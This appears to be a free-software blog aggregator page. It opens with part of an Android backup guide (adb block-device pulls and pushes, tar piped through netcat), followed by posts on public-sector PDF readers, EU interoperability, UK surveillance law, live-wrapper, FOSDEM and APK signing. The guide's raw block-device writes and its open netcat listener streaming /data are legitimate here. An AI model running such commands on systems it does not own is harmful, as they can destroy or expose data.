Block-level backups take up a lot of space (without compression) and extracting single files is cumbersome (especially when talking about encrypted data partitions or backups of the whole flash). On the other hand, "just" restoring a full backup is easy.

Backing up a single partition

Now that you know which block devices you want to backup, you can directly create a 1:1 image via adb pull as you would normally do by using dd. In our case:

$ adb pull /dev/block/platform/s3c-sdhci.0/by-name/userdata

7942 KB/s (1073741824 bytes in 132.027s)

On your workstation, you will obtain a file named userdata which contains the whole partition/filesystem as an image. If you didn't enable encryption on your Android device, you can directly mount this file as a loopback device and access its contents:

$ mount userdata /mnt

Restoring a single partition


BE CAREFUL! RESTORING THE WRONG IMAGE OR WRITING TO THE WRONG BLOCK DEVICE CAN RUIN YOUR DATA OR EVEN BRICK YOUR ANDROID DEVICE!

To restore your backup, you can simply use adb push. In my case:

$ adb push userdata /dev/block/platform/s3c-sdhci.0/by-name/userdata

failed to copy 'userdata' to '/dev/block/platform/s3c-sdhci.0/by-name/userdata': No space left on device

The "No space left on device" message can show up when the image exactly fills the partition, because the push simply stops at the end of the block device. In that case the data has usually still been written completely; when in doubt, compare checksums of the image and the block device before relying on the restore.

Alternative: Operating on the whole block device

Instead of backing up just a single partition, it is also possible to back up the whole flash device including all partitions. Example:

$ adb pull /dev/block/mmcblk0

Remarks:

  • On some devices, not all partitions are readable, so those cannot be backed up.
  • Please be careful with restores!
  • Accessing files inside this image is not straightforward (but doable).

Filesystem-level approach

Filesystem-level backups only work for single partitions, but they take up only as much space as the files on the filesystem you back up, and individual files in them are easy to access. I am using a combination of adb, netcat and tar to create and restore these backups.

Backing up your data

First, connect to your device via an adb shell:

$ adb shell

Then, change to the directory from where you want to create your backup. If the data partition was not mounted automatically, you have to mount it first:

# mount /dev/block/platform/s3c-sdhci.0/by-name/userdata /data

Now change to this directory:

# cd /data

Now, start the netcat process:

# tar -cvpf - . | busybox nc -lp 5555

On the receiver side (desktop), set up adb port forwarding:

$ adb forward tcp:4444 tcp:5555

Then, start the process to receive the tar file:

$ nc -w 10 localhost 4444 > userdata.tar

You should see your files being packed up on the Android side:

./
./lost+found/
./dontpanic/
./misc/
./misc/adb/
./misc/audit/
./misc/audit/audit.log
...

Now wait for the process to exit.

Restoring your data

Again, on the receiver side (this time the Android device), mount /data if it was not mounted yet and change into it:

# mount /dev/block/platform/s3c-sdhci.0/by-name/userdata /data
# cd /data

Now, start the tar extraction process:

# busybox nc -lp 5555 | tar -xpvf -

On the sender side (desktop), again, set up adb port forwarding:

$ adb forward tcp:4444 tcp:5555

And send the tar file:

$ cat userdata.tar | nc -q 2 localhost 4444

Now you should be able to see your previously backed up files getting restored...
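
The two tar halves of these pipelines can be exercised locally, with the netcat transport replaced by a plain pipe. This sketch (the demo directory names are made up) is also a handy way to check that your tar options round-trip files correctly:

```shell
# Pack a directory the way the device side does, and unpack it the way
# the restore side does, with a plain pipe standing in for nc:
mkdir -p demo-src demo-dst
echo 'hello' > demo-src/file.txt
( cd demo-src && tar -cpf - . ) | ( cd demo-dst && tar -xpf - )
cat demo-dst/file.txt
# prints: hello
```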

References

For the filesystem-level part of the article I used and adapted the following sources:

  • http://www.screenage.de/blog/2007/12/30/using-netcat-and-tar-for-network-file-transfer/
  • http://stackoverflow.com/questions/15278587/pipe-into-adb-shell

Tuesday, 01 November 2016

Adoption of Free Software PDF readers in Italian Regional Public Administrations (third monitoring)

Tarin Gamberini | 09:30, Tuesday, 01 November 2016

The following monitoring shows that, in the last semester, ten Italian Regions have reduced advertising for proprietary PDF readers on their websites, and that one Region has increased its support for Free Software PDF readers.

Continue reading →

Monday, 31 October 2016

EIF v.3. – citizens demand for more Free Software, while businesses seek to promote true Open Standards

polina's blog | 16:35, Monday, 31 October 2016

As reported earlier, the European Commission (EC) is currently revising the European Interoperability Framework, a set of guidelines, recommendations and standards for EU e-government services. At the end of June 2016, the EC closed its 12-week open public consultation. The FSFE provided its answers to the EC, where we highlighted the need to promote Open Standards and Free Software – key enablers of interoperability.

According to the recently published Factual Summary of the contributions received by the EC, we were not the only ones to see the plausible effect of Free Software and Open Standards on interoperability in the EU public sector. The majority of the respondents identified “the use of proprietary IT solutions by public administrations, often creating a situation of vendor lock-in” to be a problem for interoperability in the EU.

According to the analysis, the majority of the comments raised by citizens on the draft EIF were related to:

“the need for openness (i.e. open data, open standards, open file formats, open source projects) and transparency.”

The additional action that was suggested to be included in the revised strategy by business/private organisations was to:

“promote the use of (true) open standards and support of standards in new technologies”.

We hope the European Commission will take the wishes of EU citizens and businesses into account when revising the EIF.


Image: “Open” by opensource.com, CC BY-SA 2.0.

Sunday, 30 October 2016

Powers to Investigate

Iain R. Learmonth | 00:17, Sunday, 30 October 2016

The Communication Data Bill was draft legislation introduced first in May 2012. It sought to compel ISPs to store details of communications usage so that it can later be used for law enforcement purposes. In 2013 the passage of this bill into law had been blocked and the bill was dead.

In 2014 we saw the Data Retention and Investigatory Powers Act 2014 appear. This seemed to be in response to the Data Retention Directive being successfully challenged at the European Court of Justice by Digital Rights Ireland on human rights grounds, with a judgment given in 2014. It essentially reimplemented the Data Retention Directive along with a whole load of other nasty things.

The Data Retention and Investigatory Powers Act contained a sunset clause with a date set for 2016. This brings us to the Investigatory Powers Bill, which looks set to pass into law shortly.

Among a range of nasty powers, this legislation will be able to force ISPs to record metadata about every website you visit, every connection you make to a server on the Internet. This is sub-optimal for the privacy minded, with my primary concern being that this is a treasure trove of data and it’s going to be abused by someone. It’s going to be too much for someone to resist.

The existence of this power in the bill seemed to confuse the House of Lords:

It is not for me to explain why the Government want in the Bill a power that currently does not exist, because internet connection records do not exist, and which the security services say they do not want but which the noble and learned Lord says might be needed in the future. It is not for me to justify this power; I am saying to the House why I do not believe it is justified. The noble and learned Lord and the noble Lord, Lord Rosser, made the point that this is an existing power, but how can you have an existing power to acquire something that will not exist until the Bill is enacted?

– Lord Paddick (link)

Of course, the internet connection records are meaningless when your traffic is routed via a proxy or VPN, and there is a Kickstarter in progress that I would love to succeed: OnionDSL.

The premise of OnionDSL is that instead of having an IPv4/IPv6 connection to the Internet, you join a private network that does not provide any routing to the global Internet and instead provides only a Tor bridge. I cannot think of anything that I do from home that I cannot do via Tor and have been considering switching to Qubes OS as the operating system on my day-to-day laptop to allow me to direct basically everything through Tor.

The idea of provisioning a non-IP service via DSL is not new to me, I’ve come across it before with cjdns which provides an encrypted IPv6 network using public key cryptography for network address allocation and a distributed hash table for routing. Peering between cjdns nodes can be performed over Ethernet and cjdns over Ethernet could be provisioned in place of the traditional PPP over Ethernet (PPPoE) to provide access directly to cjdns without providing any routing to the global Internet.

If OnionDSL is funded, I think it’s very likely I would be considering becoming a customer. (Assuming the government doesn’t attempt to also outlaw Tor).

Saturday, 29 October 2016

live-wrapper 0.4 released!

Iain R. Learmonth | 03:21, Saturday, 29 October 2016

Last week saw the quiet upload of live-wrapper 0.4 to unstable. I would have blogged at the time, but there is another announcement coming later in this blog post that I wanted to make at the same time.

live-wrapper is a wrapper around vmdebootstrap for producing bootable live images using Debian GNU/Linux. Accompanied by the live-tasks package in Debian, this provides the toolchain and configuration necessary for building live images using Cinnamon, GNOME, KDE, LXDE, MATE and XFCE. There is also work ongoing to add a GNUstep image to this.

Building a live image with live-wrapper is easy:

sudo apt install live-wrapper
sudo lwr

This will build you a file named output.iso in the current directory containing a minimal live image. You can then test this in QEMU:

qemu-system-x86_64 -m 2G -cdrom output.iso

You can find the latest documentation for live-wrapper here and any feedback you have is appreciated. So far it looks like booting from CD and USB with both ISOLINUX (BIOS) and GRUB (EFI) is working as expected on real hardware.

The second announcement that I wanted to accompany this announcement is that we will be running a vmdebootstrap sprint where we will be working on live-wrapper at the MiniDebConf in Cambridge. I will be working on installer integration while Ana Custura will be investigating bootloaders and their customisation. I’d like to thank the Debian Project and those who have given donations to it for supporting our travel and accommodation costs for this sprint.

Wednesday, 26 October 2016

FOSDEM 2017 Real-Time Communications Call for Participation

DanielPocock.com - fsfe | 06:39, Wednesday, 26 October 2016

FOSDEM is one of the world's premier meetings of free software developers, with over five thousand people attending each year. FOSDEM 2017 takes place 4-5 February 2017 in Brussels, Belgium.

This email contains information about:

  • Real-Time communications dev-room and lounge,
  • speaking opportunities,
  • volunteering in the dev-room and lounge,
  • related events around FOSDEM, including the XMPP summit,
  • social events (the legendary FOSDEM Beer Night and Saturday night dinners provide endless networking opportunities),
  • the Planet aggregation sites for RTC blogs

Call for participation - Real Time Communications (RTC)

The Real-Time dev-room and Real-Time lounge is about all things involving real-time communication, including: XMPP, SIP, WebRTC, telephony, mobile VoIP, codecs, peer-to-peer, privacy and encryption. The dev-room is a successor to the previous XMPP and telephony dev-rooms. We are looking for speakers for the dev-room and volunteers and participants for the tables in the Real-Time lounge.

The dev-room is only on Saturday, 4 February 2017. The lounge will be present for both days.

To discuss the dev-room and lounge, please join the FSFE-sponsored Free RTC mailing list.

To be kept aware of major developments in Free RTC, without being on the discussion list, please join the Free-RTC Announce list.

Speaking opportunities

Note: if you used FOSDEM Pentabarf before, please use the same account/username

Real-Time Communications dev-room: deadline 23:59 UTC on 17 November. Please use the Pentabarf system to submit a talk proposal for the dev-room. On the "General" tab, please look for the "Track" option and choose "Real-Time devroom". Link to talk submission.

Other dev-rooms and lightning talks: some speakers may find their topic is in the scope of more than one dev-room. You are encouraged to apply to more than one dev-room and also to consider proposing a lightning talk, but please be kind enough to tell us if you do this by filling out the notes in the form.

You can find the full list of dev-rooms on this page and apply for a lightning talk at https://fosdem.org/submit

Main track: the deadline for main track presentations is 23:59 UTC 31 October. Leading developers in the Real-Time Communications field are encouraged to consider submitting a presentation to the main track.

First-time speaking?

FOSDEM dev-rooms are a welcoming environment for people who have never given a talk before. Please feel free to contact the dev-room administrators personally if you would like to ask any questions about it.

Submission guidelines

The Pentabarf system will ask for many of the essential details. Please remember to re-use your account from previous years if you have one.

In the "Submission notes", please tell us about:

  • the purpose of your talk
  • any other talk applications (dev-rooms, lightning talks, main track)
  • availability constraints and special needs

You can use HTML and links in your bio, abstract and description.

If you maintain a blog, please consider providing us with the URL of a feed with posts tagged for your RTC-related work.

We will be looking for relevance to the conference and dev-room themes, presentations aimed at developers of free and open source software about RTC-related topics.

Please feel free to suggest a duration between 20 minutes and 55 minutes but note that the final decision on talk durations will be made by the dev-room administrators. As the two previous dev-rooms have been combined into one, we may decide to give shorter slots than in previous years so that more speakers can participate.

Please note FOSDEM aims to record and live-stream all talks. The CC-BY license is used.

Volunteers needed

To make the dev-room and lounge run successfully, we are looking for volunteers:

  • FOSDEM provides video recording equipment and live streaming, volunteers are needed to assist in this
  • organizing one or more restaurant bookings (depending upon number of participants) for the evening of Saturday, 4 February
  • participation in the Real-Time lounge
  • helping attract sponsorship funds for the dev-room to pay for the Saturday night dinner and any other expenses
  • circulating this Call for Participation (text version) to other mailing lists

See the mailing list discussion for more details about volunteering.

Related events - XMPP and RTC summits

The XMPP Standards Foundation (XSF) has traditionally held a summit in the days before FOSDEM. There is discussion about a similar summit taking place on 2 and 3 February 2017. XMPP Summit web site - please join the mailing list for details.

We are also considering a more general RTC or telephony summit, potentially in collaboration with the XMPP summit. Please join the Free-RTC mailing list and send an email if you would be interested in participating, sponsoring or hosting such an event.

Social events and dinners

The traditional FOSDEM beer night occurs on Friday, 3 February.

On Saturday night, there are usually dinners associated with each of the dev-rooms. Most restaurants in Brussels are not so large so these dinners have space constraints and reservations are essential. Please subscribe to the Free-RTC mailing list for further details about the Saturday night dinner options and how you can register for a seat.

Spread the word and discuss

If you know of any mailing lists where this CfP would be relevant, please forward this email (text version). If this dev-room excites you, please blog or microblog about it, especially if you are submitting a talk.

If you regularly blog about RTC topics, please send details about your blog to the planet site administrators:

  • All projects: Free-RTC Planet (http://planet.freertc.org), contact [email protected]
  • XMPP: Planet Jabber (http://planet.jabber.org), contact [email protected]
  • SIP: Planet SIP (http://planet.sip5060.net), contact [email protected]
  • SIP (Español): Planet SIP-es (http://planet.sip5060.net/es/), contact [email protected]

Please also link to the Planet sites from your own blog or web site as this helps everybody in the free real-time communications community.

Contact

For any private queries, contact us directly using the address [email protected] and for any other queries please ask on the Free-RTC mailing list.

The dev-room administration team:

Tuesday, 25 October 2016

Robot Repair

David Boddie - Updates (Full Articles) | 22:41, Tuesday, 25 October 2016

A while ago I suspended my exploration of Android development, having reevaluated my priorities and taken a step back from a period of fairly intensive work on tools. Back in June, I wrote a brief overview of the status of my compiler tools then didn't really look at them until this week. The first thing I needed to do was to figure out why I could no longer build packages for my phone.

Running to Stand Still

To get myself familiar with the build process again, I decided to rebuild a simple prototype for a game that I had been working on. Everything seemed to go as planned – the tools didn't complain about anything, so I hadn't left the code in a non-working state. However, when I used adb to upload the package to the phone, the package manager rejected it with a terse and unhelpful response, which adb helpfully relayed back to the console:

Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES]

If you search the Web for this error, you will quickly discover that it seems to be one of the package manager's favourite catchphrases, covering all sorts of problems it finds with packages. Unfortunately, this makes finding useful advice about it very difficult — the Android site doesn't seem to include anything useful about errors delivered via adb, probably because the average developer is supposed to be using Android Studio, not “messing about” at the command line. Having spent a few years working on API documentation and manuals for developers, I imagine that someone thought that information about command line tools would somehow take something away from the beautiful learning journey they had planned for new developers, so decided not to make that a priority. Perhaps my cynicism is uncalled for. In any case, trawling the Web for answers led to the usual sites where I found desperate programmers wailing and thrashing around while onlookers suggested things like cleaning their project and reading the documentation. How helpful!

To cut a long story short, a site I'd visited earlier provided a way to help diagnose the problem. Unpacking packages I'd built before the summer – using unzip because APK files are just ZIP files – and packages I had just built this week, I was then able to inspect their certificates with the following command:

openssl asn1parse -i -inform DER -in META-INF/CERT.RSA

It turned out that when signing my packages, openssl was including a field that claimed the digest used was sha1 but was using sha256 to create the digest. This was not happening in June, and it turns out that an update to the Debian openssl package in September (version 1.0.1t-1) included a change to the default message digest algorithm used. I “fixed” my problem by ensuring that my new signing certificate is created using the same digest algorithm that I use when signing packages. Still, not everything worked straight away – installing my newly created package on the phone failed with this complaint:

Failure [INSTALL_PARSE_FAILED_INCONSISTENT_CERTIFICATES]

However, searching for this error proved much more fruitful and enlightening than for the previous one, and the solution – uninstall the old version of the application – was simple and quick.
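
A quick way to reproduce and check the digest mismatch described above is to inspect which message digest a certificate was actually signed with. A sketch using a throwaway self-signed certificate (the file names are made up):

```shell
# Create a throwaway self-signed certificate, explicitly requesting
# sha256, then read back the digest recorded in its signature field:
openssl req -x509 -newkey rsa:2048 -nodes -sha256 -days 1 \
    -subj '/CN=demo' -keyout demo-key.pem -out demo-cert.pem 2>/dev/null
openssl x509 -in demo-cert.pem -noout -text | grep -m1 'Signature Algorithm'
# prints (indented): Signature Algorithm: sha256WithRSAEncryption
```

If the algorithm printed here differs from the one openssl later uses when signing packages, you get exactly the kind of mismatch described above.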

Rebooting the Robot?

It would probably be good to document a few things I did earlier in the year, though I'm even less inclined to stare at Android documentation than I was before. It would be useful to be able to make the occasional small application for my own purposes and I'm quite accustomed to the peculiarities of my own toolchain, though others might find it a little strange to get used to.

Categories: Free Software, Android
